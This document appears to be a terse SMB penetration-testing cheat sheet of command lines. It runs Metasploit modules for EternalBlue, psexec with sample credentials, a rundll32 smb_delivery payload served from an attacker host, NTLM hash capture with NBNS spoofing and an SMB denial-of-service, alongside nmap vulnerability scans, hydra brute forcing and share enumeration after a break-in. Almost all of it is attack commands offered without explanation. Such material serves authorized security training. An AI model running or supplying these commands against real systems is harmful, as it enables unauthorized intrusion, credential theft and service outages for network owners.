Exploit via SMB

nmap -p 445 -A 192.168.1.101 
nmap -sV -sC -vv -oN nmap.txt 10.5.27.180
nmap --script smb-vuln* -p 445 192.168.1.101

use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
msf exploit(ms17_010_eternalblue) > exploit


SMB login via Brute Force
hydra -L user.txt -P pass.txt 192.168.1.101 smb

use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit

PSexec – To Connect SMB
use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit

Rundll32 One-liner to Exploit SMB
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

SMB Exploit via NTLM Capture    
use auxiliary/server/capture/smb

msf auxiliary(smb) > set srvhost 192.168.1.109
msf auxiliary(smb) > set johnpwfile /root/Desktop/
msf auxiliary(smb) > exploit

auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.1.109
msf auxiliary(nbns_response) > set interface eth0
msf auxiliary(nbns_response) >exploit

SMB DOS-Attack
use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
msf auxiliary(ms10_006_negotiate_response_loop) > exploit


Post Exploitation
use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit

File Sharing  
Smbexec.py

Smbclient
smbclient –L 192.168.1.108